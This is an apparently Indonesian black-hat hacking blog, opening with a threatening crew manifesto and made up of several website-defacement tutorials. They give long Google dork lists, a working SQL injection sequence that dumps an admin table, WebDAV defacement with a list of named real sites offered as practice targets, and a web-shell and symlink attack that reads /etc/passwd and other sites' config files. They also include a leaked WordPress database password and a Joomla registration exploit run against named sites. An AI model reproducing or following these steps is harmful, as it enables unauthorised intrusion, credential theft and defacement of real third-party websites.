Message Form Senopati Black Hat : | We Are a bunch of experienced people | hack not a game | hack was our work | For Attacking us : you may dream | to destroy us : you do not be so sure | To colonize us, we'll bring you death | to remove our from the internet, your death before the eyes | we do not know mercy | We never forgive | Join Us for our Being | (ISC_Crew) Thanks For Visited |

Sabtu, 09 Agustus 2014

0 Deface Web Dengan Metode Sql injection dan HackBar


Alat : Browser Firefox . Kenapa harus firefox ? Karena kita harus menginstall addons HACKBAR yang [sepertinya] hanya ada di Firefox. Hackbar itu seperti apa sih ? Nih screenshotnya ;



Fungsinya ? Simak saja tutorialnya sampai akhir maka anda akan tahu fungsi dari hackbar. Untuk yang belum menginstall hackbar silahkan menuju link berikut :
https://addons.mozilla.org/id/firefox/addon/hackbar/

Oke, kita mulai tutorialnya :

Step 1 :
Dork paste di google :
source.php?id=
dl.php?id=
service.php?id=
anime.php?id=
application.php?id=
plugin.php?id=
purchase.php?id=
report.php?id=
world.php?id=
overview.php?id=
journal.php?id=
static.php?id=
content.php?id=
projects.php?id=
record.php?id=
feed.php?id=
topic.php?id=
display_main.php?id=
blog.php?id=
subcatergory.php?id=
author.php?id=
inside.php?id=
popup2.php?id=
work.php?id=
trailers.php?id=
howto.php?id=
play.php?id=
press_release.php?id=
mirrors.php?id=
interview.php?id=
contribute.php?id=
entry.php?id=
standard.php?id=
country.php?id=
flash_games.php?id=
flash.php?id=
flashgames.php?id=
file.php?id=
skill.php?id=
links.php?id=
form.php?id=
single.php?id=
book.php?id=
node.php?id=
release.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?* *=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?* *=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?* *=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?* *=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?* *=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?* *=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=


bisa kalian kreasikan sendiri :D
cotoh website: http://target.com/content/research.php?cid=2
Kita tambahkan tanda kitip satu ['] atau tanda takterhingga [~] di akhri url untuk memastikan apakah webnya vuln SQLi atau tidak.
Sehingga menjadi : http://target.com/content/research.php?cid=2'

Di situ tertulis : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by uid' at line 1 . Error ! Artinya web tersebut vuln SQLi

Step 2 :
Lanjut. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” . Cari hingga menemukan error.
http://target.com/content/research.php?cid=2 order by 1-- normal
http://target.com/content/research.php?cid=2 order by 2-- normal
http://target.com/content/research.php?cid=2 order by 3-- normal
http://target.com/content/research.php?cid=2 order by 4-- normal
http://target.com/content/research.php?cid=2 order by 5-- normal
http://target.com/content/research.php?cid=2 order by 6-- ERROR

di "order by 6" kita mendapatkan error dengan tulisan : Unknown column '6' in 'order clause'. Sekarang kita sudah tahu kalo jumlah kolom di databasenya ada 5.

Step 3 :
Sekarang kita mulai mencari "angka" yang bisa kita injeksi di step sejanjutnya dengan memasukkan perintah union select. Perhatikan saja url yang saya tulis dibawah :
http://target.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [ ingat, setelah ?cid= diberi tanda - ]


Muncul angka 3 dan 4 .

Step 4 :
Sekarang kita coba untuk melihat versi php dengan angka ajaib tadi. Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi.
http://target.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ]

Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan. Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari databasenya.

Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--

Kita melihat ada table admin, research, vcounter .

Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa user dan password ? Tentu jawabannya adalah di table admin. Kita coba melihat kolom dari table admin tersebut .
Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() . Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .

Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)

Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah “ group_concat(table_name) ” dengan perintah “ group_concat(column_name) ” dan mengganti perintah “ information_schema.tables “ menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=[hasil convert MySQL CHAR() - Step 6] ”

http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Kita mendapat kolom aid, admin id, admin pass di tabel admin.

Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name) menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass) dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ . disitu kita melihat ada tanda 0x3a. Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda : sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--

Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay

Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin" ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder. Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://target.com/admin ( kalian bisa mencari page adminnya lewat havij)

Masukkan user dan password sesuai dengan data yang telah kita dapat.

Jumat, 08 Agustus 2014

0 Deface Website dengan Web Folder Di Windows 7

Banyak sekali tutorial yang saya temukan tentang cara deface website dengan menggunakan teknik web folder. Namun kebanyakan tutorial tersebut menggunakan OS XP, Windows 2000, Windows 2003 dan Server IIS 5.0/6.0. Tapi kali ini saya akan membahas cara deface website dengan web folder ini di windows 7.

Langsung saja berikut langkah-langkahnya :
Cari dulu targetnya. Jika Anda ingin mendapatkan target secara acak bisa menggunakan google dork dengan menggunakan keyword allinurl:*.asp , allinurl:*.aspx dan sebagainya.
  1. Persiapkan halaman defacement Anda, misal hacked.html atau deface.asp
  2. Buka window explorer
  3. Kemudian di dalam tampilan windows explorer klik kanan dan pilih Add a network location
  4. Selanjutnya klik nekt Pada Internet or network addres, masukkan alamat website target Anda! misal target Anda adalah http://handistar.fr/
  5. klik nekt dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.
  6. Selanjutnya memberikan nama web folder tersebut, klik nekt saja langsung karena secara otomatis akan memberikan nama sesuai alamat website tsb.
  7. klik finish dan web folder tersebut akan muncul di windows explorer Anda.
  8. Langkah selanjutnya masukkan halaman defacement Anda yang sebelumnya sudah dipersiapkan, misal deface.html ke dalam web folder yang telah dibuat tadi.
  9. Untuk membuka hasil deface Anda tersebut tinggal menambahkan nama file defacement Anda dibelakang url website tsb. Misal: http://handistar.fr/ menjadi http://handistar.fr/deface.htm
Contoh hasil deface saya : http://handistar.fr/deface.htm
Ini saya kasih targetnya untuk percobaan:
zgsfjw.net
centro.anje.pt
www.ziangli.com
6.shicheng.gov.cn
www.ville-mordelles.fr www.podiocom.com www.journeezerotracas.fr www.journeezerotracas.com www.journee0tracas.com www.comune.torrice.fr.it www.chinamaster88.com www.chateaudelepinay.fr www.centroformazioneitalia.it www.bjautoobd.com www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
malaysiahealthcareindonesia.com
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
www.zjgsxy.com
Selamat mencoba, semoga berhasil!!!

Senin, 23 Juni 2014

0 Cara Deface web Dengan WSO Shell

Bahan & Alat :
1) Target Website
2) Shell (aq gawe' WSO shell)
3) script symlink (tak jelasno nang mburi ae)
4) MySQL manager

Langkah 1
Sekarang, kita periksa situsnya apa ada yg vuln utk dihajar :v
Ada satu hal yang tersisa, kita dapat hack situs tsb pada server yang sama ( 1 server ) #aneh yoo? maksute opo ? tapi tungguen Big Grin baca dulu sampe rampungg...

Jadi kita udah punya target toh, langkah selanjutnya, kita harus cari tau IP servernya target

Yuk pergi ke CMD ( Start->RUN->CMD )
ping www.target.com

Sekarang kita dah memiliki(mengetahui) IP Server nya, skrg waktunya untuk cari celah ( vuln ) nya.

Pergi ke SINI dan masukan kode dibawah ini :
IP:IPYANGUDAHKITADAPETDARIPINGTADI ".php?*="

Selanjutnya,dari hasil scan IP tadi Big Grin cari sebuah situs yang rentan terhadap SQLi. (Bisa di inject menggunakan tools seperti havij dll)

Kalo sukses, segera tanem shell

Langkah II
Hal pertama yang perlu dilakukan adalah menemukan path lengkap dari situs tsb.
yakni seperti begino:
/home/username/public_html/

Sekarang pergi ke shell dan jalankan perintah ini:
cat /etc/passwd

Sekarang copy semua teks yg tertera di situh dan tempel ke notepad.
Itu file berisi semua pengguna yg menggunakan server yg jadi target muw Tongue


Langkah III
Target ku adalah Joomla dan aq tau di mana file yg berisi informasi MySQL. (config.php)
/home/targetsaya/public_html/configuration.php ( Ini config nya joomla )

"Kalau wordpress mas ?"
Kalo targetmu wordpress , config nya ada disini
/home/targetmu/public_html/wp-config.php

Nah, sekarang upload symlink mu dan mySQL Manager nya ,
Buka symlink nya dan masukin path config web targetmu
dalam kasus ku iku :
/home/softcube/public_html/configuration.php
Terus,,
Sekarang klik "Symlink" dan skrg kita dapet mysql info nya

Salin semua ke Notepad + +
( Notepad++ lebih baik karena kita dapat dgn mudah menemukan password dan username)
Cari username dan password web targetmu yg da tercantum di mysql info nya,,dan buka mysql.php ,
Masukkan dan sekarang kita dpat mengedit database.

Sekarang klik "Tabel" dan klik table "admin".
disini kita bisa membuat user, staff, dan membuat pssword
(Ingatlah untuk mencatat hash asli sehingga cara hackmu tetep gak terdeteksi jika ingin akses lgi)

Sekarang, aq sudah mengganti hash(password admin) dan login

Sekian tutorial kali ini,, semoga bermanfaat ya sobat ^_^

0 Deface web Dengan Metode Symlink

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)



















Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.


















Lalu klik user & domain & symlink.


















Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".



















Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.


















Perhatikan baris ini :
define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.


















Klik koneksi MySQL.

















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



















Lalu, saya klik "wp_user".



















Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).


Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a





















Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 

















Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob (^_^).

Saya berhasil masuk (^_^).


















Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).

0 Cara Deface Web Dengan Metode Com_user


Assalamulaikum Wr Wb
sebelumnya kita memanjatkan puji syukur
ke hadirat allah swt.,
karena kita semua diberi kesehatan dan rejeki
amiin;.,
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha
mereka yang berhasil adalah orang yang berusaha untuk tujuannya
oke pertama - tama kita kumpulkan bahanya dulu ..,

Exploit Joomla | Com_user  view source | Dowload
Dork: 
inurl:/index.php/login intext:Joomla! site:.com
inurl:/index.php/login site .com
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. site:.uk
intitle:Don't Have Account ? site:.com
intitle:Login- site.com
inurl:itemid= site:uk
inurl:itemid= site:com
inurl:itemid= site:id
inurl:itemid= site:nl
inurl:itemid= site:ck
inurl:itemid= site:jp
inurl:itemid= site:it
intext:Joomla 1.7
inurl:index.php/19-sample-data-articles/ joomla site:it
Monggo dipilih 1 aja :)
Dork dikembangin sendiri okeh :)
Exploit: index.php?option=com_users&view=registration
Shell (jika perlu)
Scanner web vuln COM_USER : Ciri - ciri web vuln COM_USER :
ciri - ciri berikut berdasarkan garis bawah., yang hampir dekat dengan garis footer.,
berarti webtadi vuln..,

Update: Garis bawah lebih jauh dari garis footer normalnya., itu dianggap vuln juga ^^
contoh gambar :




Cara Memakai :

1.Pertama - tama kita buka link  berikut
   dan kita copy file tadi ke notepad., lalu kita simpan dalam format .html
   cara simpan ke file html., klik save > pilih allfiles > beri nama "ExploitJoomla.html"
   seperti gambar dibawah ini :
   lebih gampangnya anda dowload  exploit joomla nya disini
 
 
buka https://www.google.com/ atau https://www.google.co.id
   kita search dengan dork tadi., dan saya mengambil salah satunya :)
   misalnya : inurl:/index.php/login intext:Joomla! site:.com 
    seperti gambar dibawah ini



2.Kalau sudah ketemu (targetnya) biar lebih singkatnya
   misal target ane www.aspie.org.uk


3.kita exploit tin target tadi dengan menambahkan
   index.php?option=com_users&view=registration
   atau /index.php/login?view=registration
    hasil seperti ini:
   www.aspie.org.uk/index.php/login?view=registration
    atau anda bisa lihat gambar dibawah
 
4. Kalau udh tekan ctrl + u  atau klik kanan > view - source (yang ada di google chrome)


5.Habis itu tekan ctrl + f
   atau anda bisa klik kanan > pilih find
   masukkan kode ini "hidden" ., pilih yang bawah sendiri atau cari seperti kode berikut.,
   lihat gambar dibawah

6. Copy kode tadi ke exploit joomla.html yang udh kalian dowload tadi.,
    cara membuka file exploit joomla.html ke notepad  :
     Klik kanan Exploit Joomla.html > Pilih open with > pilih Notepad
     copy kan urlsite seperti yang saya tandai di gambar
      #note:silahkan ganti username., email.,
      Setelah itu klik FIle > save
       atau tekan tombol ctrl + s

7. buka file Exploit Joomla.html (double click file Exploit Joomla.html
     lalu klik "register"

8. lalu di site register tadi, akan muncul peringatan berupa " You passwords entered do not macth.
    Please enter you desired password in the password field and confirm you entry by entering
    it in the confirm" yang artinya anda disuruh memasukkan password yang sama., untuk
   melanjutkan ke step selanjutnya., dan masukkan password mu di kolom password dan
   confirm password., dan klik tombol register.,
    seperti gambar dibawah ini



9.  nanti akan ada peringatan berupa., registrasi berhasil., "sebelum login anda harus mengaktif
      kan user lewat email "
      setelah itu., check email anda., akan ada email dari web tadi.,
      dan buka email tadi .,
     #NB : liat email bisa di kotak pembaruan., kotak utama ., dan kotak spam
     letak kotak spam ada di ., Tab selengkapnya > spam > daftar email spam

10. kita buka email masuk dari web tadi., kita buka link konfirmasinya
      seperti yang saya tandai di gambar berikut

11.Kalo udh selesai akan ada peringatan sebagai berikut
    "Your account has been succesfully activated.You can now log in using the username
       and password you choose during registrasion" berarti registry anda berhasil.!
      dan anda disuruh untuk mengambil confirmasi email nya
      contoh gambar
12. Setelah itu., ke admin loginnya
      contoh admin login joomla (defaultnya) : /administrator  .,  /admin
      sebagai contoh www.aspie.org.uk/administrator
      dan akan kebuka form login admin joomla.,
      mari kita login..,
      user : yazid
      pass : bustomi
     Klik tombol "log in"
 13. Taraaaaaaaaaaaaaaaaaaaaaaaaaaaa., kita masuk admin loginnya ^_^
       tinggal tebas index aja tuh :)
       trus gimana tebas indexnya ?
       use your brain okeh :)
      NB : Kalo ga berhasil ke login admin berarti web tadi udh ga vuln (udh dipacth )



SELAMAT MENIKMATI :)
Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , index., home , com_user , exploit , joomla
html., footer, php , 
TERIMAKASIH